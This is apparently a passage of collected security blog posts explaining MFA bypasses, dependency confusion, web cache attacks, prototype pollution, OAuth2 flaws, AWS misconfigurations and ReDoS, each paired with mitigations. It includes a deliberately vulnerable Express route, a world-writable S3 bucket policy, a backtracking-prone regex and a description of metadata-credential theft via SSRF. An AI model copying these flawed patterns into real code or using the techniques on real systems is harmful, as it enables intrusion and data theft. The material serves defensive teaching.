According to Proofpoint, the use of transparent reverse proxies (TRPs) are growing popularity as more and more toolkits are available on the market, for such as, Evilginx2

2. Authentication code or OTP interception via email or SMS 

SMS, Email based MFA or other OTP based MFA  are popular MFA solutions used in security due to their simplicity. However, the authentication code could be intercepted by hackers through various ways. From the traditional social engineers to the most recent OTP interception bot,  an attacker shows how largely authentication code could be intercepted and used to bypass MFA.

Limitation 3: MFA protection could be useless due to flaws in pages that handle it

In many instances, the improper MFA implementation in your application allows hackers a way to get around the MFA authentication. Below are some cases where MFA could be bypassed due to flaws in MFA implementation.

Lack of rate limit control leads to brute force

The MFA authentication code or OTP code is typically 4 or 6 digits long. A hacker may use brute force to obtain the right OTP code if the application’s rate limit restriction was ineffective. 

Here are a few disclosure from hackerone

Bypass Slack Two Factor Authentication using Brute Force and Bypass Ubiquiti 2FA using Brute Force.

Buggy MFA  implementation leads to MFA bypass

MFA protection may be useless if the authentication code verification is faulty. These are a few instances of improper MFA  implementation that I have observed during penetration testing and learning from some public disclosure

An authentication code from a different user could be used by another user 

For instance, after logging into his own account, an attacker may obtain a valid OTP token for himself and use it to overcome MFA by authenticating the victim.

A prior session’s authentication code could be used repeatedly. 

Another frequent occurrence is the persistence of an authentication token created for a previous session after use. That implies that the MFA may be defeated if an attacker obtained any earlier authentication code.

Logic Error for MFA code verification

A public disclosure about 2FA bypass  shows a 2FA was bypassed when an user send an empty authentication code to the server

The situations just stated are but a few; in my opinion, there are many more implementation errors contributing to the failure of MFA.

Limitation 4: Email and SMS based MFA are not really sufficient

One misconception about MFA is that the security effects of various MFAs are the same because they all add extra layers of factor during authentication to protect account login. Because of this misunderstanding, many businesses opt for the most convenient method to implement, such as SMS or Email tokens as their MFA methods. 

The fact is that some are fundamentally more secure than others, while others are more practical. The graphic below could be used to show the various security effects of the most popular MFA technique. The weakest MFA methods are email-based and SMS-based MFA

Because an email address is not linked to a particular device, email based 2FA is the least secure of all methods. It is simple to obtain the authentication code from your email inbox because many MFA bypass methods presumptively involve email account breach for the victim. Besides Email based MFA, many security researches also show that using SMS based MFA could impose another risk factor for your organization.

Potential Methods to enhance your MFAs

MFAs have their limitations, but there are things we can do to lessen the effects of these restrictions.

  • Improve Security Awareness Training
  • Avoid using SMS or email-based MFA and opt for key-based MFA, is possible
  • Enforce Secure SDLC when implementing your own MFA
  • Ensure the MFA has a throttle or account lockout method enabled
  • Regularly audit your MFA login logs

Conclusion

Setting up MFA is still the best thing you can do to safeguard your account login, despite the limitations it has. But It is crucial to be aware of the limitations of MFA and to remember not to completely rely on its security whether you use it from a reputable provider or apply it yourself.

How Dependency Confusion attack works and How to prevent it

Dependency confusion is a novel type of supply chain security issue after it was first disclosed by Alex Birsan in 2021 .This attack, as the name implies, might be initiated via a perplexing dependency manager tool (npm for NodeJs, pip for Python, rubygems for Ruby) to install a malicious dependency package. 

Before we dive deep into the issue,  let’s have a look at how package manager tools pull and install packages on a workstation. The graphic below depicts the workflow when the command ‘npm install express‘ is done on a workstation.

How Package Manager Tool works

How does dependency confusion attack works?

A dependency confusion attack occurs when a dependency library is downloaded from a public registry rather than the intended private/internal registry because a malicious attacker could trick the package manager (npm for NodeJs, pip for Python, rubygems for ruby) into downloading the malicious one from the public repository he controls.

To deceive the package manager tools into downloading the malicious package from the public registry, the attacker must meet the following prerequisites.

  1. Find the name of a package that the victims wants to install
  2. Create an identically named package and publish it under the public or default registry.
  3. Assign the package with a higher version number to trick the package manager tool to download it from public repo.

Occasionally, if the private registry is misconfigured. As a result of this misconfiguration, a developer’s machine or a server may be erroneously configured to collect packages from the public registry. For example, if a developer tries to install an internal package at home but does not have access to the private registry where valid packages are hosted, the package manager will try to see if a package with the same name is hosted under a public registry and use it

The diagram below depicts how Confusion Dependency exploits are initiated.

How to prevent dependency confusion attacks?

There is no silver bullet to prevent dependency confusion as this kind of attack is a consequence of an inherent design flaw in the default configuration of many package manager tools.  Instead, there are a number best practices that we could follow to help us to mitigate the potential risks.

Here are a number of best practices and mitigation method we could use

1. Prevent at the source: Reserve the package name in public registry
2. Prevent at the source: Reserve a company namespace or scope in public registry
3. Prevent at configuration: Unitize namespace and scope to ensure private registry is used
4. Prevent at configuration: Use version pinning to explicitly declare package version
5. Prevent at action: Verify package source before installing
6. Continuous Monitoring: Monitor the public registry and get alerted

Prevent at the Source: Reserve the package name in public registry

By claiming all the internal package names in the public or default registry, the will prevent a malicious attacker from hijacking the same package names and publish malicious pages under the public registry. 

This method prevents a malicious package with the same name as the internal package name from being published under the public registry at the source, which is a highly effective and reliable way to prevent dependency confusion regardless of whether there is a server misconfiguration or human errors when pulling a dependency package.

Prevent at the Source: Reserve a company namespace or scope 

Another way to prevent dependency confusion at the source is to reserve a company namespace or scope in the registry. A scope or namespace enables you to create a package with the same name as another user’s or organization’s package without conflict. This means that an organization can claim many package names under a special namespace, but an attacker will not be able to create packages under this scope because only the owner of the scope could publish packages under this scope.

The potential disadvantages are as follows: a) you must modify your manifest package management files to include the namespace or scope. b) If the namespace or scope was ignored during manual package installation, a developer might nonetheless fetch a harmful package.

Prevent at Configuration:  Unitize namespace and scope to ensure private registry is used (Client Side Control)

Some package managers allow for namespaces or other prefixes, which can be used to ensure that internal dependencies are pulled from private repositories (eg, Github) or registry defined with the appropriate prefix/scope.

Here’s an example where the dependency is explicitly stated to be pulled from a Github repository.

Prevent at configuration: Version pinning 

Dependency version pinning is a client side control method by specifying the version of a package that application will use. By setting the dependency version, it  ensures the package managers will not pull and install dependencies from the public registry in case an malicious attacker sets a higher version number for the malicious package with the identical internal package name.

There are some downsides of using version pinning.  Sometimes, if you use version pinning in the package management manifest file, for example, package.json, it will protect you against a very small portion of your direct dependency packages. The transitive dependency could still be vulnerable to dependency confusion. You should use the version pinning under the lock file, for example, package-lock.json, this allows you to lock both direct and transitive dependency into a/several specific versions.

Prevent at action: Verify package source before install

It would be very beneficial if developers could validate the package source before installing a new package or upgrading it to a higher version to avoid human errors. Take npm for example, you could use the npm view command to view the package before installing. Below is an result when running command npm view express and it tells the source of the package

Continuous Monitoring: Monitor the public registry and get alerted

I used to write an automation tool to combat package typosquatting attacks by sending HTTP requests to public registries to check for typosquatting packages. An alert is sent to our organization when a potential typosquatting package is detected. I believe we could create a similar tool and run it at regular intervals to be alerted when your internal package names are published in public registries.

Conclusion

Defending against dependency confusion attacks is a critical component of software supply chain security. Many regulations and countermeasures could be implemented at the source or configuration level by your company. Because imposed countermeasures cannot always prevent human errors, it is critical to train your engineers to exercise cautions and follow the aforementioned best practice  when upgrading or adding a package.

Web Cache Security Issues: Web Cache Deception and Web Cache Poison

How does web cache work?

In order to reduce the HTTP requests latency and reduce the performance stress of the application servers, an web application would have some  web data, for example, images, js files, css file, HTML context  files, json template, URLs copied and stored in a different storage or place (your browser, proxy server or a CDN)for a certain amount of time, we call it Cache.  After these data are stored in Cache, these cached web data could be served to some users directly rather than asking the application servers to extract data over and over again when users are making requests to these data.

In general, web cache could be categorized as client side cache ( browser cache)  or remote server side cache (Proxy, CDN). The data stored in the browser will only serve the local user when using that browser; whereas, the cached data on the server side will  be distributed and served to many users.

The diagram below depicts how Client Side Cache and Server Side Cache work in a web request, and how App Server could reduce the requests by utilizing cache.

How Web Cache works
How web cache works

Security Issues in Web Cache

Web caching improves performance and convenience, but it has a drawback: security. 

Security issues in client side Cache(Browser Cache)

The risk with browser side caches is that you may leave sensitive information on a browser cache. Users with access to the same browser could steal the cached data. Risks are more likely to occur in public terminals, such as those found in libraries and Internet cafes.  In this article, we will focus more on the security issues on the server side cache.

Security Issues in the server side cache

The most common security issues discovered in the web cache are Web Cache Deception and Web Cache Poison. Web cache deception is when an attacker tricks a caching server into incorrectly storing the victim’s private information, and then the attacker gains access to the cached data by accessing the cache server. In contrast, web cache poisoning is an attack in which a malicious user stores malicious data in the web cache server, and the malicious data is distributed to many victims by the cached server.

Difference between Web Cache Deception and Web Cache Poison

Engineers are frequently perplexed by the terms Web Cache Deception and Web Cache Poison. Let’s use the table below to tell the difference between web cache deception and web cache poison.

Which data are cached?How does an exploit happen?Is Interaction required?
Cache DeceptionVictim’s private data unconsciously stored 1. An attacker impersonates a path within an application, such as http://example.org/profile.php/noexistening.js, and causes the victim to click on the link.

2. Assuming the victim has logged in and the profile.php page contains sensitive data, the victim clicks on the link http://example.org/profile.php/noexistening.js. Due to some loose configuration or misconfiguration, the App server receives the requests and pulls the data for page http://example.org/profile.php.

3. Because the content of this page has not yet been cached in the Cache Server (step 6 in Diagram 1), the data will be cached by the cache server due to the extension noexistening.js, which the cache server considers to be a static file.

4. Now the sensitive data of victims under http://example.org/profile.php/noexistening.js. has been cached in the web cache server.

5. The attacker could make a request to http://example.org/profile.php/noexistening.js to pull the data from the web cache server as most of the web cache server has no authentication implemented. 
Yes. The attacker has to trigger the victim to visit a crafted link.
It will only affect the victims who access the crafted link
Cache PoisonMalicious data crafted by an attacker1. An attacker identifies and evaluates unkeyed inputs in the HTTP request, mostly headers.

2. An attacker injects a piece of malicious code into the unkeyed inputs and makes a request to the app server

3. The app server extracts data for the malicious request by consuming the malicious codes. 

4. The responses with the malicious codes will be rendered to the attacker and the response content will be stored on the web cache server.

5. The victim makes a request to the same page as the attacker and obtains the cached data from the web cache server. The malicious code will be executed at the victim’s end because the cache data contains malicious code.
No.  Any users who get data from the compromised cache server. 
Difference between Web Cache Deception and Web Cache Poison

According to the table above, certain prerequisites must be met for a successful web cache deception or web cache poisoning.

Prerequisites for web cache deception
  • Web cache setting is based on file extension disregarding cache header
  • The victim has to to be authenticated when the attacker trigger the victim to access the crafted link.
  • Loose or misconfiguration in the application route handler so that web server will return the content https://yourapplication/profile when the users make a request to https://yourapplication/profile/test.js. The following snippet is a simple nodejs application with this kind of misconfiguration.
var express = require("express"),
    app = express.createServer();

function fooRoute(req, res, next) {
  res.send("YOUR_PROFILE_PAGE");
}
app.get("/profile*", fooRoute);
app.listen(3000);
Prerequisites for web cache poison
  • An attacker need figure out some unkeyed headers and able to trigger the backend server to return content containing the malicious payload added to these unkeyed headers
  • The content with the malicious payload is cached in the cache server and will be distributed to the victims.

How to Prevent Web Cache Deception and Web Cache Poison

It is unlikely that you could ask your engineering team to disable cache altogether. Here are some common mitigation methods that we could prevent these kind of cache issues.

Only Cache Static File

Cache should be strictly applied by truly static files and it should not change based on user input.

Don’t accept Get request with suspicious header

Some web developers are not implement strict validation against HTTP request header as it is really hard for an attacker to modify the HTTP headers of the requests originated by a victim. However, if these vulnerability is used together with web cache, the damage could be devastating. When the web server process a Get request, it should add a validation function to some HTTP headers.

Prototype Pollution, an overlooked application security hole

Some well-known NPM packages, including ember.js, xmldom, loader-utlis and deep-object-diff, have recently been found to have a few prototype pollution vulnerabilities. I made the decision to investigate these vulnerabilities in order to see if there were any trends that we could identify and steer clear.

All of the NPM packages are open source, which allows us to evaluate where vulnerabilities were introduced and how they are remediated by reviewing the fixes. 

A brief Overview of Prototype Pollution Vulnerability

We may need to examine some fundamental concepts about JavaScript Prototype and how Prototype pollution vulnerabilities are introduced and how they could be exploited before we dig in to see if there are any common patterns in these vulnerable libraries.

What is Prototype in JavaScript

Every object in JavaScript has a built-in property, which is called its prototype. The prototype is itself an object, so the prototype will have its own prototype, making what’s called a prototype chain. The chain ends when we reach a prototype that has null for its own prototype.

The following code snippet defined an Object called Student, the prototype of the Student is Object and it has many predefined properties

One power of the Prototype is that it allows an object to inherit properties/attributes from its prototype. Under this case,  Student object could inherit and use all the predefined properties of its prototype Object.

Key takeaway 1:  an object could access the properties/attribute of its prototype due to the inheritance of Prototype. Under this example, the toString() function is defined by Student prototype Object and it could be accessed by any Student object.

Key takeaway 2:  An object could have many instance, they could shared the same Prototype properties 

Key takeaway 3: Meanwhile, JavaScript allows some Object attributes to be changed during runtime, that includes the prototype property; though overwriting the prototype of a default object is considered as a bad practice. 

How does prototype pollution occur and how to exploit them

As the term “prototype pollution” suggests, it happens when a hostile attacker has the ability to manipulate and alter an object’s prototype. Once an attacker could modify the object’s prototype,  all the instances that share the object prototype properties would be affected

Let us tweak the aforementioned code by modifying the toString() properties of the Object prototype to a customized function in order to clarify the explanation. 

When running the above code under the browser console, the studObj.toString() statement will be executed using the new toString() function once we update the toString() function of its Object prototype, and the same will be true for the newly generated object  {} since they both share the same Object Prototype.

If you look at the payload we used in the example above, you’ll see that it has three parts

Part 1: studObj.__proto__.__proto__.

This is intended to obtain the target Object.Prototype, you may see many more .__proto__. in the actual payloads if the prototype chain is very long.

Part 2: .toString 

Using this section, we may tell which function we wish to change or add to the Object.Prototype. In this example, we want to override the toString() function defined in the Object.Prototype

Part 3: = function() {return “I am changed”}

This part is used to set up the new value for the prototype property. 

In a nutshell, access to the Object.Prototype and the ability to modify or add its properties are required for a successful exploit. You may start to think how any app would allow these conditions to be met. In the next section, We will examine the four most current Prototype vulnerabilities to 1) see how the property pollution vulnerabilities are introduced into the codes and 2) see what sort of mitigation methods are employed to fix the prototype pollution.

Case studies for Prototype Pollution Vulnerability & Remediation

Case 1: Prototype Pollution Vulnerability in Ember.js < 4.4.3 (PR

Root Cause

Ember.js provides two functions EmberObject.setProperties or EmberObject.set to set properties of an object.

As there is no validation on the untrustPath variable, if an attacker defines the path to __proto__.__proto__.srcdoc, it would modify the property of the fundamental Object, which will affect all the objects inherited from it.

Mitigation

By referring to the remediation PR,  the mitigation method is to forbid specific keyword __proto__ and constructor to block a prototype chain access. 

Case 2: Potential Prototype Pollution vulnerability in xmldom < 0.7.7

Root Cause

The potential prototype pollution vulnerability (CVE-2022-37616) is caused when this library provides the following function to copy one DOM element to another. (I marked it as potential because a valid POC has not been provided and this copy is NOT performing a deep clone). 

Mitigation

The hasOwnProperty() method is used in this mitigation procedure (PR) to determine whether the src object has the requested property as its own property (as opposed to inheriting the Prototype property). The copy function will fail if the src attribute is inherited from its prototype to prevent a malicious user to access the Prototype Property

Case 3: Prototype Pollution in webpack loader-utils < 2.0.3

Root Cause

This potential vulnerability (CVE-2022-37601) was caused by the queryParse() function when parsing the query parameter and composing a new Object called result with the query parameter name and value.

Mitigation

The mitigation method is very straightforward by using Object.create(null) on objects created as Object.create(null) does NOT inherit from Object.prototype. It means the created Object is not able to access the Prototype Property

Case 4: Prototype Pollution in deep-object-diff

Root Cause

This weakness was introduced when two items were compared deeply and the difference between the two objects was returned as a new object. Due to the possibility that the difference contains prototype property and is under the attacker’s control. It enables the prototyping of pollution.

Mitigation

Similar to Case 3, the mitigation method is using Object.create(null) to create an object where Prototype property could not be inherited. 

When going through all the reported vulnerabilities, cit seems these vulnerabilities are likely to be introduced when following operation occurs

  1. Path assignment to set the property of an Object.  (Case 1, Case 3)
  2. Clone/Copy an object   (Case 2, Case 4)

The common mitigation method includes

  1. Create objects without prototypes inheritance Object.create(null) (case 3,case 4)
  2. Use hasOwnProperty()  function to check  whether a property is on your actual object or inherited via the prototype   (Case 2)
  3. Validate the user input with specific keyword filtering (Case 1)

Prototype Vulnerabilities, a much wider security issue

After reviewing several real-world examples of how prototype vulnerabilities could be developed and how to exploit them, I continued by examining some NPM open source libraries to determine whether prototype pollution is a widely ignored issue in the NPM open source libraries.

Without spending too much effort,  I discovered and verified that two open source libraries used for merging objects are vulnerable to Prototype vulnerability by scraping the source code under Github using specific patterns listed below. 

These two libraries appear to be rather dated though there are still hundreds of downloads every week, however I have contacted the maintainer but have not yet received a response.

All of these instances, in my opinion, are really the tip of the iceberg in terms of how JavaScript libraries are vulnerable to prototype pollution.

I see two possible explanations for why this vulnerability is so prevalent: 1) Given that this vulnerability is very recent, few developers appear to be completely aware of it. 2) At the moment, automation methods to find this kind of vulnerability are not very mature. 

How to Identify OAuth2 Vulnerabilities and Mitigate Risks

OAuth2 Vulnerability Case Studies based on HackerOne Public Disclosure Reports

Even though OAuth2 has been the industry-standard authorization framework since it replaced OAuth1 in 2012, its many complexities have led to potential security issues. For security engineers, it’s vital to understand what OAuth2 is, how it works, and how poor implementation can lead to vulnerabilities.

In this article, we’ll highlight some common attack vectors or vulnerabilities against OAuth2 by referring to HackerOne public disclosure reports with actual cases  — and explain how to mitigate those.

What is OAuth2?

OAuth2 is a widely used framework for access delegation, which allows users to grant limited access to one application (client application) by requesting the resource of the users hosted in another application or website (resource application).

If you have some basic knowledge about OAuth2 but have never implemented OAuth2 in your application, the two diagrams below might help you to refresh the concepts of OAuth2 and the mechanism of how it works. The diagrams illustrate the workflow for two common OAuth2 grant types, authorization code grant (Figure 1) and the still-in-use but deemed insecure implicit grant (Figure 2).

OAuth2 itself is fundamentally complicated as it is designed to resolve the vital authentication part in many complex web environments (mobile app, web server, etc). Due to the complexity, many security engineers may not fully understand the power of OAuth2. As a consequence, we are observing many security issues caused by a misconfiguration or poor implementation of OAuth2. To make it worse, some exploitations against these OAuth2 misconfigurations are extremely simple and easy to launch.

Common OAuth2 Vulnerabilities from HackerOne’s Public Disclosure

Let’s take a look at some common attack vectors or vulnerabilities against OAuth2 by referring to HackerOne public disclosure reports. We hope the explanations of these vulnerabilities are clear by making reference to the actual exploitation disclosure. At the end of each of the following sections, you will also learn how to mitigate these vulnerabilities.

Vulnerability 1: Missing validation in redirect_uri leads to access token takeover

HackerOne Reports:

https://hackerone.com/reports/665651

https://hackerone.com/reports/405100

The redirect_uri parameter in the OAuth2 workflow is used by the authorization server as a location or address to deliver the access_token or auth_code by means of a browser redirect. In Figure 1, we described that the redirect_uri parameter is initialized by the client application as part of the request to the authorization server under step 2 when a web user clicks the login button. After the authorization server validates the credentials (step 6), it will send back the auth_token (or access_token for an implicit grant step 7 in Figure 2) as a parameter to the redirect_uri used in step 2.

If a malicious user could trigger the victim to send a request to the authorization server with a redirect_uri controlled by the attacker and the authorization server is NOT validating the redirect_uri,  the access_token will be sent to the URI controlled by the attacker.

The case of stealing users’ OAuth tokens via redirect_uri is, unfortunately, a typical one, where the authorization server performs a poor validation on the redirect_uri and the attacker is able to bypass the validation with a malicious link they control.

Mitigation

Implement a robust redirect_uri validation on the authorization server by considering the following approach:

  1. Perform a match between client_id and report_uri to ensure the report_uri matches with the client_id stored in the authorization server. 
  2. Use a whitelist approach if the number of client applications is manageable.

Vulnerability 2: Missing state parameter validation leads to CSRF attack

HackerOne Reports

https://hackerone.com/reports/111218

https://hackerone.com/reports/13555

In OAuth2 implementation, the state parameter (initialized under step 2) allows client applications to restore the previous state of the user. The state parameter preserves some state object set by the client in the authorization request and makes it available to the client in the response. 

Here is the correct implementation of the state parameter:

  1. The client application initialized the request to the authorization server with a state parameter in the request URL (Step 2).
  2. The client application stores the state parameter value in the current session (Step 2).
  3. The authorization server sends the access_token back to the client application (Step 7 in Figure 2) together with a state parameter.
  4. Client application performs a match between the state stored in the current session and the state parameter sent back from the authorization server. If matching, the access_token will be consumed by the client application. Otherwise, it will be discarded so that it could prevent the CSRF attack.

However, since the state parameter is not required for a successful OAuth2 workflow,  it is very often this parameter is omitted or ignored during OAuth2 implementation. Without validation on the state parameter, CSRF attack could be launched easily against the client application.

This HackerOne report is a very good example to explain how an attacker could attach their account to a different account under the client application due to the lack of the state parameter. Sometimes, even the state parameter is present in the callback request from the authorization server, but it is still possible the state parameter is not validated, leaving the application vulnerable to CSRF attack.

Mitigation

Ensure the state parameter is passed between requests and state validation is implemented so that an attacker could not attach their account to the victim’s account.  

Vulnerability 3: Client_secret mistakenly disclosed to the public 

Hackerone Report

https://hackerone.com/reports/272824

https://hackerone.com/reports/397527

The client_secret is used by the client application to make a request to the authorization server to exchange the auth code to the access token (step 8 in Figure 1). The client_secret is a secret known only to the client application and the authorization server. 

Some developers may accidentally disclose the client_secret to end users because the access_token retrieve request (step 8 in Figure 1) is mistakenly executed by some front-end JavaScript code rather than performed by the back-end channel.

In reference to this HackerOne Report about token disclosure, the client_secret is publicly exposed in the HTML page as the exchanging auth_code with access_token (Step 8 in Figure 1) process is executed by a piece of JavaScript code.

Mitigation

To avoid disclosing client_secret to the public, it is best for developers to understand the need of implementing OAuth2, as there are different OAuth2 options to adopt for different applications. If your client application has a back-end server, the client_secret should never be exposed to the public, as the interaction with the authorization server could be completed in a back-end channel. If your client application is a single-page web application or mobile app, you should choose a different OAuth2 type. For example, use the Authorization Code grant with PKCE instead.

Vulnerability 4: Pre-account takeover 

Hackerone Report

https://hackerone.com/reports/1074047

A pre-account takeover could occur when the following two conditions are met: 

  1. The client application supports multiple authentication methods, using a login with a password and a third-party service (like Facebook or Google) as an OAuth authentication provider.
  2. Either the client application or the third-party service does not perform email verification during the signup process.

This HackerOne report details how a misconfigured OAuth can lead to pre-account takeover:

  1. Attacker creates an account with a victim’s email address and the attacker’s password before the victim has registered on the client application.
  2. The victim then logs in through a third-party service, like Google or Facebook.
  3. The victim performs some sensitive actions in the client application. The client application will save these actions, and it will probably use the email address as an identifier for its users in the database.
  4. Now, the attacker could log in as the victim and read the sensitive data added by the victim by using the victim’s email address and the attacker’s password created by step 1.

Mitigation

Perform email validation when creating a new user.  

Vulnerability 5: OAuth2 access_token is leaked through referrer header 

Hackerone Reports

https://hackerone.com/reports/835437

https://hackerone.com/reports/787160

https://hackerone.com/reports/202781

One weak design of OAuth2 itself is that it passes the access_token in the URL for implicit grant type. Once you put sensitive data in a URI, you risk exposing this data to third-party applications. This applies to OAuth2 implementation as well. 

In this HackerOne report about access_token smuggling, for example, the access_token was exposed to a third-party website controlled by the attacker after a chained redirection by taking advantage of the referrer header.

Mitigation

As this is a design issue of OAuth2, the easiest mitigation method would be 

strengthening the referrer header policy with <meta name=”referrer” content=”origin” />.

Vulnerability 6: OAuth2 login bypass due to lack of access_token validation

Hackerone Report

https://hackerone.com/reports/245408

A lack of access_token validation by the client application makes it possible for an attacker to log in to other users’ accounts without knowing their password.

Once the authorization server sends the access_token back to the client application, client applications sometimes need to bind the access_token with a user identity so that it can store it as a session. The exploitation of this vulnerability happens when an attacker binds their access_token with any user identity and then impersonates that user without logging in.

In this HackerOne report, the security researcher was able to log in as any user just by supplying the victim’s email address only because the client application did not validate whether the access_token belongs to the correct owner. 

Mitigation

Validation should be performed on the client side to check whether the user owns the access_token.

Summary

The OAuth2 framework is complicated and provides many flexibilities for implementation. However, due to this flexibility, the security of OAuth2 implementation is in the hands of the developers. With that said, developers with a strong security mindset can make implementation more secure; on the contrary, developers with less security training are likely to impose some security holes during OAuth2 implementation. For any organization, it’s vital to train and educate your developers with the latest security best practices to reduce risk during OAuth2 implementation.

Five Common AWS Misconfigurations from Pentest Perspective

Shifting to cloud is becoming more prevalent as a cloud based platform could provide operation efficiency, simplicity if the best security practices and proper configuration are enabled when utilizing the cloud vendors. However, sometimes a misconfiguration in utilizing AWS could lead to deadly data breaches. 

Common misconfigurations in AWS cloud

In this article, we will break down the 5 most common misconfigurations or ignorance which could lead to a nasty data breach from a pentest perspective.

Misconfiguration 1:  Dangling DNS Records lead to Subdomain takeover

If a DNS record entry is pointing to a resource, for example, S3 bucket, IP address, cloudfront instance that are not available and the DNS record is still present in your DNS zone, this is called a “dangling DNS”.  A  “dangling DNS” in your AWS configuration is likely to lead to subdomain takeover exploitation. 

When an attacker finds a dangling DNS, they could create and claim the non-available or non-existent resource  and host some malicious content after claiming the non-existent resource (S3 bucket or IP address, etc) . Now when the users are visiting the DNS domain in their browser, their traffic will be directed to the malicious content controlled by the attacker.

Take the following  scenarios for a better illustration,

  1. An organization created a DNS record, files.example.org and CNAME to  an AWS S3 bucket filessharing_example.s3.amazonaws.com to host some static javascript files
  2. The organization deleted the S3 bucket or the S3 bucket expired and the organization did not renew it. AWS will recycle this S3 bucket name and make it available for other users to claim it.
  3. When the attacker found the DNS record files.example.org  is pointing to a nonexist S3 bucket.  The attacker could claim the S3 bucket and host some malicious content in this S3 bucket
  4. Now the victims visit files.example.org in its browser, they will be visiting the malicious content controlled by the attackers.

S3 bucket takeover is the most common exploitation when performing penetration test because the exploitation is very straightforward and simple

Mitigations

The mitigation for dangling DNS is easy, to keep robust hygiene practices. When a resource in your AWS is deleted or removed, you need sunset or delete the corresponding DNS record too. 

Misconfiguration 2: Internal servers deployed in public subnets

AWS provides a default VPC for a new account. Sometimes, a developer is deploying a server and database directly in the default public subnet of that VPC to speed up the deployment for testing or POC purposes. 

Take the following scenarios as an example, a developer was trying to perform a POC to its potential clients.  In order to ensure the clients have access to the service, the developers deployed an EC2 instance with the demo into a public network. As a consequence, this could lead to potential data breach if the EC2 instance is hosting an internal application or has the database installed in it.

Mitigation

Deploy internal servers under private subnets and set up the correct security groups to limit the right groups of applications to access it.  If the server is a public facing application, ensure that only the necessary ports are running.

Misconfiguration 3: Over permissive S3 bucket

Misconfigured permission of S3 buckets has been identified as the root causes for many data breaches even though AWS set all its buckets and its objects private by default.

Most of these incidents happen when the Resource Based Policies (Bucket Policies) is not correctly configured. In a bucket policy, the owner of the bucket could specify which user has which kind of permissions (read, write,list) to this bucket. A developer or an owner could mistakenly grant permissions to the undesired users. 

Take the following publicly disclosed incident for example, the organization is using the following Bucket policy to configure permissions for its S3 bucket

{
  "Sid": "AllowPublicRead",
  "Effect": "Allow",
  "Principal": {
    "AWS": "*"
  },
  "Action": [
    "s3:GetObject",
    "s3:PutObject"
  ],
  "Resource": "arn:aws:s3:::media.twiliocdn.com/taskrouter/*"
}

This bucket policy means anyone could read and write any files under the /taskrouter/ directory under this bucket.  

Mitigation

Follow the security best practices listed by AWS when configuring your AWS S3 bucket, for example, try to apply least privilege access, enable data encryption, blocking public access to S3 bucket.

Misconfiguration 4:  EC2 Metadata Service leaks Secret Token via SSRF

SSRF became a new category of OWASP Top 10 (2021) as it enables attackers to use vulnerable servers to request and receive data from protected internal sources and lead to serious attack. The impact of SSRF is being worsened by the offering of public clouds, like AWS.  For example, the most notorious capital one data breach was caused by SSRF exploitation. As a penetration tester, to steal EC2 Metadata with AWS credentials is becoming a standard POC to demonstrate the exploit and damage of the SSRF vulnerabilities.

The following two factors could be blamed for the widespread SSRF attacks against AWS cloud.

 1) there is a Metadata service running http://169.254.169.254 in most of EC2 instances, 

 2) the service will reveal the IAM credentials of the role attached to the EC2 instances.

Mitigations

Enforcing IMDSv2 to your EC2 instance could significantly reduce the risk of SSRF attack as the IMDSv2 requires a PUT request prioring to extracting the AWS credentials with a get request.

Misconfiguration 5:  Private AMIs got shared with public

Accidentally public Amazon Machine Images (AMIs) is another common security issue observed during penetration testing. AWS allows its customers to customize the instance (for example, installing software, configure sensitive environment variables on the instance) and then save it as a custom AMIs. 

Once a customized AMI is saved, it could be shared among different accounts or shared with the public.  Sometimes, AMI could be shared with the public by mistakes and it leaks to sensitive data leakage if the AMI contains sensitive information.

Conclusion

There are far more misconfigurations that could put your cloud platform in jeopardy. These 5  misconfigurations are the most common misconfigurations in AWS cloud infrastructure from my perspectives when performing penetration testing.

Nevertheless to say, to securely configure a cloud based platform utilizing AWS is a very challenging task as AWS itself is complex and it takes time and effort to understand all the features and options. Sometimes, this is made worse when the recommended configuration or setting is not suitable for your organization or platform.  

However, the aforementioned 5 common misconfigurations are not hard to discover when you are following the AWS Security best practices and performing a regular audit against your platform.

ReDOS, it could be the cause of your next security incident

Regardless of which positions you are fulfilling in the development lifecycle in your organization, regular expressions are useful tools to make your work more efficient. While writing a basic regex itself might not be very hard, defining a robust and secure one could be a real challenge. 

You may start to ponder that I remembered that some security incidents were caused by an insufficient regex pattern where a malicious user input was NOT blocked or detected by the regex. You are right in that perspective and this is a very common scenarios of poor regex leading to a security incident. But in this article, I would like to talk about the danger of poorly designed regexes from a different perspective, ReDOS, which is an overlooked security issue by many developers and  security engineers in my opinion.

ReDOS, an overlooked security risk

Before we start the exploration of ReDOS, we need to understand two basic things 1) Regular expression is a sequence of characters that specifies a search pattern in text, which are commonly used by string-searching algorithms 2) when the regex matching (string searching) is performed, the behind scene algorithm is using a so called backtracking algorithm, where it is a brute forcing method to find a solution/path in a context that will match with the regex, it means there could be an infinite loop when a regex matching is performed behind the scene.  That is the root cause of the DOS caused by regular expression, ReDOS, for short.

Though the severity of ReDOS could be critical as it could paralyze your web server just with a single malformed string, this vulnerability is always overlooked by many security engineers because 1)they are not able to identify a regex with potential ReDOS vulnerability 2) ignore or underestimate the risk of it 3)not able to craft a malicious string to demonstrate the exploitation of this vulnerabilities.  As a security engineer, I was trying to downplay the severity of the ReDOS vulnerability as well as I was not persuaded to believe one single string would be able to totally freeze a web server.  I started to change my mind after I was able to  exploit a ReDOS vulnerability imposed by an inefficient regex with an elaborate string. During the exploitation, the elaborate string consumed 100% CPU of the server when a regex match is performed between the string (payload) and regex

How did I start?

When I was performing a static code analysis against a piece of code with some help of a SAST tool, a vulnerability was flagged against the following regex and it states the following piece of regex could lead to ReDOS attack.  (Note: The regex was modified and changed to make the POC easier to follow)

var regex = /\A([\sa-z!#]|\w#\w|[\s\w]+\”)*\z/g

After reviewing the regex, I started to craft a string by using an online tool https://regex101.com/ to match the regex. It did not take me long to find out that the regex101 is reporting Catastrophic backtracking  error when evaluating the following string.

That error message clearly shows the regex has a flaw in it. I was then using the Debugger functions provided by Regex101 to validate how the backtrack steps are created. After running the debugger,  it indicated that there are some group repetitions in the regex, which makes the backtracking into an endless loop.

After figuring out a possible ReDOS vulnerability could be exploited, I created the following POC codes and ran it on a free tier AWS EC2  t2.micro instance (1G RAM).

The CPU usage of the EC2 instance hiked to 100% after the length of the test payload reached 99 characters after running the POC code, which really surprised me. 

The above POC definitely changed my understanding of the ReDOS vulnerability as the impact could be catastrophic. You might start to ask yourself about how to spot this kind of vulnerability in your code and eliminate it before it gets exploited.

Identify DeROS vulnerabilities in you codes 

It is relatively complicated to justify whether your regex is vulnerable to ReDOS. However, there are a couple of approaches that could make it a little bit easier for you.

Use some patterns to evaluate your Regex

Suggested by OWASP, there are so called pattern to identify evil regex 

  • Grouping with repetition
  • Inside the repeated group:
    • Repetition
